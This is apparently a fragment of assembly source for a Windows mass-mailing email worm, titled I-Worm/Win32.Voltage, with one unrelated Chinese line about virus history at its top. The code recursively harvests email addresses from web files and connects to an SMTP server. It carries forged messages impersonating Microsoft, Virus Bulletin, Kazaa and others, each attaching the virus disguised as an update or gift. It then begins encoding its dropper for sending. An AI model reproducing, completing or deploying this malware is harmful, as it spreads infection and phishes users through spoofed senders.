i-worm_win32.voltage病毒源代码.txt

浅析计算机病毒历史与发展 病毒是以磁盘为主要载体的。本文基于目前的现实情况

NumberOfEmails dw 0
TempDir db 0ffh dup(0)


FindFiles:
;recursive scan directorys for files
lea eax,[ebp + WIN32_FIND_DATA]
push eax
lea eax,[ebp + search_mask]
push eax
call [ebp + FindFirstFile]
cmp eax,INVALID_HANDLE_VALUE
je ExitFind
mov dword ptr [ebp + hfind],eax ;save search handle
@find: mov eax,[ebp + dwFileAttributes]
and eax,FILE_ATTRIBUTE_DIRECTORY
cmp eax,FILE_ATTRIBUTE_DIRECTORY ;is directory ?
jne Is_File
cmp byte ptr [ebp + cFileName],"." ;most be not .. or .
je FindNext
push dword ptr [ebp + hfind] ;save search handle
lea eax,[ebp + cFileName]
push eax
call [ebp + SetCurrentDirectory]
cmp eax,1h
je _SD
pop eax ;restore stack
jmp FindNext
_SD: call FindFiles
pop dword ptr [ebp + hfind] ;restore search handle
lea eax,[ebp + dotdot]
push eax
call [ebp + SetCurrentDirectory]
jmp FindNext 
Is_File:
lea eax,[ebp + cFileName] ;do action
call ScanFileForMails
FindNext: 
lea eax,[ebp + WIN32_FIND_DATA]
push eax
push dword ptr [ebp + hfind]
call [ebp + FindNextFile]
cmp eax,0h
jne @find ;move to next file
ExitFind:
push dword ptr [ebp + hfind]
call [ebp + FindClose] ;close the file handle
ret ;exit search

dotdot db "..",0
FILE_ATTRIBUTE_DIRECTORY equ 00000010h


;scan htm,asp,xml files for emails
;input:
; eax - file name
;output:
; none 
ScanFileForMails:
pushad
lea ecx,[ebp + MailSearchErr]
push ecx
xor ecx,ecx
push dword ptr fs:[ecx]
mov fs:[ecx],esp
@gSize: cmp byte ptr [eax + ecx],0h ;get size of file name
je ChkExt
inc ecx
jmp @gSize
ChkExt: sub ecx,4h
cmp dword ptr [eax + ecx],"mth." ;is .htm ?
je _1
cmp dword ptr [eax + ecx],"psa." ;is .asp ?
je _1
cmp dword ptr [eax + ecx],"lmx." ;is .xml ?
jne ExitMS
_1: push 0h
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push 0h
push FILE_SHARE_READ
push GENERIC_READ
push eax ;file name
call [ebp + CreateFile]
cmp eax,INVALID_HANDLE_VALUE
je ExitMS
mov [ebp + hfile],eax
xor eax,eax
push eax
push eax
push eax
push PAGE_READONLY
push eax
push [ebp + hfile]
call [ebp + CreateFileMapping]
cmp eax,0h
je _CloseF
mov [ebp + hmap],eax
push 0h
push [ebp + hfile]
call [ebp + GetFileSize]
cmp eax,0ffffffffh
je _CloseM
cmp eax,14000h
ja _CloseM ;dont scan files which are > 80k
cmp eax,200h
jb _CloseM ;dont scan file which are < 512 bytes
mov [ebp + _FSize],eax
xor eax,eax
push eax
push eax
push eax
push FILE_MAP_READ
push [ebp + hmap]
call [ebp + MapViewOfFile] ;map file into memory
cmp eax,0h
je _CloseM
mov [ebp + mapbase],eax ;file in the memory
mov ecx,[ebp + _FSize] ;size of file
sub ecx,0ah
cmp ecx,0h
jbe Unmap
mov edi,[ebp + MailsMemory] ;where to store mails
@lm: cmp byte ptr [edi],0h
je _1_
inc edi
jmp @lm
_1_: mov [ebp + LastMailPointer],0h
@checkM:cmp dword ptr [eax],"liam"
jne NotMail
cmp dword ptr [eax + 3h],":otl"
jne NotMail
add eax,7h ;skip the mailto:
cmp byte ptr [ebp + NewMail],0h
je checkC
@lm2: cmp byte ptr [edi],0h ;move to last mail
jne _2_
cmp byte ptr [edi-1],0h ;and leave 0 between the
je checkC ;new mail to the last mail
_2_: inc edi
jmp @lm2
checkC: cmp byte ptr [eax],"?" ;check char
je _Stop
cmp byte ptr [eax],"""
je _Stop
cmp byte ptr [eax],"@"
je @cpyM
cmp byte ptr [eax],"."
je @cpyM
cmp byte ptr [eax],7ah
ja BadMail
cmp byte ptr [eax],30h
jnb @cpyM
jmp BadMail
@cpyM: mov bl,byte ptr [eax]
mov byte ptr [edi],bl
inc eax
inc edi
inc dword ptr [ebp + LastMailPointer]
jmp checkC
_Stop: inc [ebp + NumberOfEmails]
inc edi
mov byte ptr [ebp + NewMail],1h
inc dword ptr [ebp + LastMailPointer]
NotMail:inc eax
loop @checkM
Unmap: push [ebp + mapbase]
call [ebp + UnMapViewOfFile]
_CloseM:push [ebp + hmap]
call [ebp + CloseHandle]
_CloseF:push [ebp + hfile]
call [ebp + CloseHandle]
ExitMS: pop dword ptr fs:[0]
add esp,4h
popad
ret ;exit mail search


MailSearchErr:
mov esp,[esp + 8h] ;restore stack
pop dword ptr fs:[0]
add esp,4h
popad
push [ebp + mapbase]
call [ebp + UnMapViewOfFile]
push [ebp + hmap]
call [ebp + CloseHandle]
push [ebp + hfile]
call [ebp + CloseHandle]
ret

BadMail:
sub edi,[ebp + LastMailPointer] ;restore mail pointer,if we
jmp NotMail ;copy invalid mail



_FSize dd 0
LastMailPointer dd 0
NewMail db 0


SYSTEMTIME:
wYear dw 0
wMonth dw 0
wDayOfWeek dw 0
wDay dw 0
wHour dw 0
wMinute dw 0
wSecond dw 0
wMilliseconds dw 0 


CheckConditions:
;check time & internet connection
lea eax,[ebp + SYSTEMTIME]
push eax
call [ebp + GetLocalTime] ;get system time
cmp word ptr [ebp + wMinute],2dh ;minute most be > 45
jb BadConditions
cmp word ptr [ebp + wDay],19h ;day most be < 25
ja BadConditions
cmp word ptr [ebp + wSecond],1eh ;second most be > 30
jb BadConditions
lea eax,[ebp + WinInetDll]
push eax
call [ebp + LoadLibrary]
cmp eax,0h
je BadConditions
xchg edx,eax
lea eax,[ebp + _InternetCheckConnection]
push eax
push edx
call [ebp + __GetProcAddress]
cmp eax,0h
je BadConditions
push 0h
push FLAG_ICC_FORCE_CONNECTION
lea ebx,[ebp + SiteToCheck]
push ebx
call eax
cmp eax,0h ;there is internet connection ?
je BadConditions
push edx
call [ebp + FreeLibrary]
stc
ret
BadConditions:
clc
ret


WinInetDll db "Wininet.dll",0
_InternetCheckConnection db "InternetCheckConnectionA",0
FLAG_ICC_FORCE_CONNECTION equ 00000001h
SiteToCheck db "http://www.google.com/",0



FromAndSubject1:

;from and subject
db "From:Microsoft Security Alert <SecurityUpdate@Microsoft.com>",0dh,0ah
db "Subject:Microsoft Security Update",0dh,0ah

SizeOfFromAndSubject1 equ ($-FromAndSubject1)

FromAndSubject2:

;from and subject
db "From:WorldSex.com <Pictures@WorldSex.com>",0dh,0ah
db "Subject:Your Dayly Pictures",0dh,0ah

SizeOfFromAndSubject2 equ ($-FromAndSubject2)

FromAndSubject3:

;from and subject
db "From:Virus Bulletin <Support@Virusbtn.com>",0dh,0ah
db "Subject:A New Tool From Virus Bulletin",0dh,0ah

SizeOfFromAndSubject3 equ ($-FromAndSubject3)

FromAndSubject4:

;from and subject
db "From:Kazaa.com <Support@Kazaa.com>",0dh,0ah
db "Subject:Get YourSelf Kazaa Media Desktop !!!",0dh,0ah

SizeOfFromAndSubject4 equ ($-FromAndSubject4)

FromAndSubject5:

;from and subject
db "From:Greeting-Card.com <FreeGreeting@Greeting-Cards.com>",0dh,0ah
db "Subject:You"ve got an e-card at greeting-cards.com",0dh,0ah

SizeOfFromAndSubject5 equ ($-FromAndSubject5)


MessageMimeHeader:

db "MIME-Version: 1.0",0dh,0ah
db "Content-Type: multipart/mixed;",0dh,0ah
db " boundary="bound1"",0dh,0ah
db "X-Priority: 3",0dh,0ah
db "X-MSMail-Priority: Normal",0dh,0ah
db "X-Mailer: Microsoft Outlook Express 6.00.2800.1106",0dh,0ah
db "X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106",0dh,0ah
db 0dh,0ah,"This is a multi-part message in MIME format.",0dh,0ah
db "--bound1",0dh,0ah
db "Content-Type: text/plain;",0dh,0ah
db " charset="windows-1255"",0dh,0ah
db "Content-Transfer-Encoding: 7bit",0dh,0ah,0dh,0ah

SizeOfMessageMimeHeader equ ($-MessageMimeHeader)



;message and filename
MessageAndFileName1:

db "Dear Microsoft Customer",0dh,0ah,0dh,0ah
db "A new vulnerability has been discovered in Internet Explorer",0dh,0ah
db "we recommending you to update internet explorer as soon as",0dh,0ah
db "possible, this vulnerablility is critical and may allow",0dh,0ah
db "execution of malicious code on your system while you use internet",0dh,0ah
db "explorer.",0dh,0ah,0dh,0ah
db "vulnerable versions:",0dh,0ah
db "Internet Explorer 5.0",0dh,0ah
db "Internet Explorer 6.0",0dh,0ah
db "if you using one of this versions please install attached update.",0dh,0ah,0dh,0ah
db "Thank You.",0dh,0ah,"The Microsoft Security Team.",0dh,0ah,0dh,0ah
db "If you do not wish to receive future Security Update E-mail from",0dh,0ah
db "Microsoft, or believe you were subscribed in error, please send",0dh,0ah
db "a blank E-mail to SecurityUpdate@microsoft.com",0dh,0ah
db "--bound1",0dh,0ah
db "Content-Type: application/octet-stream;",0dh,0ah
db " name= "Internet Explorer Update.exe"",0dh,0ah
db "Content-Transfer-Encoding: base64",0dh,0ah
db "Content-Disposition: attachment;",0dh,0ah
db " filename= "Internet Explorer Update.exe"",0dh,0ah,0dh,0ah

SizeOfMessageAndFileName1 equ ($-MessageAndFileName1) 


MessageAndFileName2:

db "150 XXX Pictures For You !!!",0dh,0ah,0dh,0ah
db "here are your dayly xxx pictures.",0dh,0ah
db "Have Fun & Enjoy...",0dh,0ah,0dh,0ah
db "we like to inform you that your account at",0dh,0ah ;try to make this letter formal :)
db "our web site will be expired at the end of",0dh,0ah
db "this month,please renew your account",0dh,0ah
db "renew of account for old members is only 25$",0dh,0ah
db "per half year.",0dh,0ah,0dh,0ah
db "Please Visit Our Web Site:",0dh,0ah
db "http://www.WorldSex.com/",0dh,0ah
db "--bound1",0dh,0ah
db "Content-Type: application/octet-stream;",0dh,0ah
db " name= "150_XXX_Pictures.exe"",0dh,0ah
db "Content-Transfer-Encoding: base64",0dh,0ah
db "Content-Disposition: attachment;",0dh,0ah
db " filename= "150_XXX_Pictures.exe"",0dh,0ah,0dh,0ah

SizeOfMessageAndFileName2 equ ($-MessageAndFileName2) 


MessageAndFileName3:

db "Dear Symantec/F-Secure/Mcafee/Trend Micro User",0dh,0ah,0dh,0ah
db "We Have Developed A New Tool That Can Block New",0dh,0ah
db "Internet Worms From Attacking Your Computer,We",0dh,0ah
db "Recommending To Install This Tool Before A New",0dh,0ah
db "Internet Worm Will Start To Spread",0dh,0ah,0dh,0ah
db "How To Use The Tool:",0dh,0ah
db "Just Run The Attached File,After You Have Run It",0dh,0ah
db "Follow The Instructions.",0dh,0ah,0dh,0ah
db "Thank You.",0dh,0ah,"The Virus Bulletin Security Team.",0dh,0ah
db "For More Information Please Visit Our Web Site:",0dh,0ah
db " http://www.virusbtn.com/",0dh,0ah,0dh,0ah
db "If you do not wish to receive future antivirus tools from",0dh,0ah
db "Virus Bulletin, or believe you were subscribed in error, ",0dh,0ah
db "please send,a blank E-mail to Subscribe@Virusbtn.com",0dh,0ah
db "--bound1",0dh,0ah
db "Content-Type: application/octet-stream;",0dh,0ah
db " name= "Antivirus Update.exe"",0dh,0ah
db "Content-Transfer-Encoding: base64",0dh,0ah
db "Content-Disposition: attachment;",0dh,0ah
db " filename= "Antivirus Update.exe"",0dh,0ah,0dh,0ah

SizeOfMessageAndFileName3 equ ($-MessageAndFileName3) 


MessageAndFileName4:
db "Dear User.",0dh,0ah,0dh,0ah
db "Sharman Networks Wants To offer You The New",0dh,0ah
db "Version Of Kazaa !!!",0dh,0ah
db "Please Read Product Description Below:",0dh,0ah,0dh,0ah
db "Kazaa Media Desktop is the world"s No. 1",0dh,0ah
db "free, peer-to-peer, file-sharing software",0dh,0ah
db "application. Features include improved",0dh,0ah
db "privacy protection; the ability to search",0dh,0ah
db "for and download music, playlists, software,",0dh,0ah
db "video files, documents, and images; the",0dh,0ah
db "ability to set up and manage music and video",0dh,0ah
db "playlists; and the ability to perform",0dh,0ah
db "multiple simultaneous searches, including",0dh,0ah
db "up to five Search Mores, which deliver up",0dh,0ah
db "to 1,000 results per search term.",0dh,0ah,0dh,0ah
db "We Have Included A Free Version Of Kazaa In",0dh,0ah
db "This Mail,Try It !!!",0dh,0ah,0dh,0ah
db "Thank You.",0dh,0ah,"Sharman Networks.",0dh,0ah,0dh,0ah
db "If you do not wish to receive future E-mail"s from",0dh,0ah
db "Sharman Networks, or believe you were subscribed in",0dh,0ah
db "error, please send a blank E-mail to Remove@kazaa.com",0dh,0ah
db "--bound1",0dh,0ah
db "Content-Type: application/octet-stream;",0dh,0ah
db " name= "Kazaa Media Desktop.exe"",0dh,0ah
db "Content-Transfer-Encoding: base64",0dh,0ah
db "Content-Disposition: attachment;",0dh,0ah
db " filename= "Kazaa Media Desktop.exe"",0dh,0ah,0dh,0ah

SizeOfMessageAndFileName4 equ ($-MessageAndFileName4) 


MessageAndFileName5:

db "Greeting-Cards.com have sent you a Greeting Card",0dh,0ah,0dh,0ah
db "One Of Your Friends Wish You Happy Year",0dh,0ah
db "Love,Fun,Good Life,And Good Luck.",0dh,0ah,0dh,0ah
db "To Show His Love He Sent You A Greeting",0dh,0ah
db "Card,Congratulations !",0dh,0ah,0dh,0ah
db "Hope you enjoy our e-cards! Spread the love and send one of our FREE e-cards!",0dh,0ah
db "Brought to you by greeting-cards.com - a better way to greet for FREE! ",0dh,0ah
db "Please Visit Greeting Cards Web site:http://www.greeting-cards.com/",0dh,0ah
db "--bound1",0dh,0ah
db "Content-Type: application/octet-stream;",0dh,0ah
db " name= "Your Greeting Card.exe"",0dh,0ah
db "Content-Transfer-Encoding: base64",0dh,0ah
db "Content-Disposition: attachment;",0dh,0ah
db " filename= "Your Greeting Card.exe"",0dh,0ah,0dh,0ah

SizeOfMessageAndFileName5 equ ($-MessageAndFileName5) 



EndOfMail:

db 0dh,0ah,"--bound1--",0dh,0ah
db 0dh,0ah,".",0dh,0ah

SizeOfEndOfMail equ ($-EndOfMail)



HELO db "HELO <localhost>",0dh,0ah
SizeOfHELO equ ($-HELO)


MAILFROM1 db "MAIL FROM:<SecurityUpdate@Microsoft.com>",0dh,0ah
SizeOfMailFrom1 equ ($-MAILFROM1)

MAILFROM2 db "MAIL FROM:<FreePictures@WorldSex.com>",0dh,0ah
SizeOfMailFrom2 equ ($-MAILFROM2)

MAILFROM3 db "MAIL FROM:<VirusAlert@Symantec.com>",0dh,0ah
SizeOfMailFrom3 equ ($-MAILFROM3)

MAILFROM4 db "MAIL FROM:<Support@Kazaa.com>",0dh,0ah
SizeOfMailFrom4 equ ($-MAILFROM4)

MAILFROM5 db "MAIL FROM:<Greets@Greeting-Cards.com>",0dh,0ah
SizeOfMailFrom5 equ ($-MAILFROM5)


QUIT db "QUIT",0dh,0ah
SizeOfQuit equ ($-QUIT)
RCPT db "RCPT TO:<"
SizeOfRcpt equ ($-RCPT)
EndOfRCPT db ">",0dh,0ah
SizeOfEndRcpt equ ($-EndOfRCPT)
__DATA db "DATA",0dh,0ah
SizeOfData equ ($-__DATA)

GetBuffer db 0ffh dup(0)

VERSION1_1 equ 0101h
AF_INET equ 2　　　
SOCK_STREAM equ　　 1　　 
SOCKET_ERR equ -1　 
HOSTENT_IP　　　equ 10h
IPPROTO_TCP equ 6h

vsocket dd 0
WSADATA: 
mVersion dw 0
mHighVersion dw 0
szDescription db 257 dup(0)
szSystemStatus db 129 dup(0)
iMaxSockets dw 0
iMaxUpdDg dw 0
lpVendorInfo dd 0

SOCKADDR:
sin_family dw 0 
sin_port dw 0
sin_addr　　　　dd　　　0　　　 
sin_zero db 8 dup(0)
SizeOfSOCKADDR equ ($-SOCKADDR)

ConnectToServer:
;connect to smtp server
lea eax,[ebp + WSADATA]
push eax
push VERSION1_1
call [ebp + WSAStartup] ;start up winsock
cmp eax,0h
jne ConnectionErr
push IPPROTO_TCP
push SOCK_STREAM
push AF_INET
call [ebp + socket] ;create socket
cmp eax,SOCKET_ERR
je WSACleanErr
mov dword ptr [ebp + vsocket],eax
push 25 ;smtp
call [ebp + htons]
mov word ptr [ebp + sin_port],ax
mov word ptr [ebp + sin_family],AF_INET
lea eax,[ebp + SmtpServerAdd]
push eax
call [ebp + gethostbyname]
cmp eax,0h
je CloseSockErr
mov eax,dword ptr [eax + HOSTENT_IP]
mov eax,dword ptr [eax]
mov dword ptr [ebp + sin_addr],eax
push SizeOfSOCKADDR
lea eax,[ebp + SOCKADDR]
push eax
push dword ptr [ebp + vsocket]
call [ebp + connect]
cmp eax,0h
jne CloseSockErr
stc
ret
CloseSockErr:
push dword ptr [ebp + vsocket]
call [ebp + closesocket]
WSACleanErr:
call [ebp + WSACleanup]
ConnectionErr:
clc
ret


CreateVirusBase64Image:
cmp byte ptr [ebp + Infection_Success],0h ;if we didnt success to infect file
je SendDropper ;or the running file is not infected
xor ecx,ecx
lea esi,[ebp + FileToInfect]
get_len:cmp byte ptr [esi],0h
je CpyPath
inc ecx
inc esi
jmp get_len
CpyPath:inc ecx
lea esi,[ebp + FileToInfect]
lea edi,[ebp + wvltg_exe_path] ;we simple send the virus dropper